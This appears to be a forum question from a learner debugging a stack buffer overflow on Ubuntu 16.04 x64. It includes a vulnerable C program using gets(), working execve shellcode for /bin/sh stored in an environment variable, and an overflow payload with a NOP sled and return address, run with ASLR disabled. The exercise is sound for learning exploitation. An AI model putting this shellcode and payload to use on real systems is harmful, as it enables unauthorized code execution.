I'm trying buffer overflow about below code
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
int main(void)
{
char str[256];
printf("Please type sentence\n");
gets(str);
printf("%s\n", str);
}
I tried buffer overflow with below shell code which is stored in environment variable
export shellcode=$(python -c 'print "\x90"*42+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05\x99"')
I typed below code as input
echo $(python -c 'print "abcdefgh"+"\x90"*256+"\xf0\xee\xff\xff\xff\x7f"')
But result is little bit strange. And I can't understand why result is like that
abcdefgh?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
process 12197 is executing new program: /bin/dash
[Inferior 1 (process 12197) exited normally]
Above is result. I called execve in shell code with syscall. And I hope sh will start. Why result is different?
I use Ubuntu 16.04, x64 architecture.
I disabled ASLR with sudo sysctl -w kernel.randomize_va_space=0
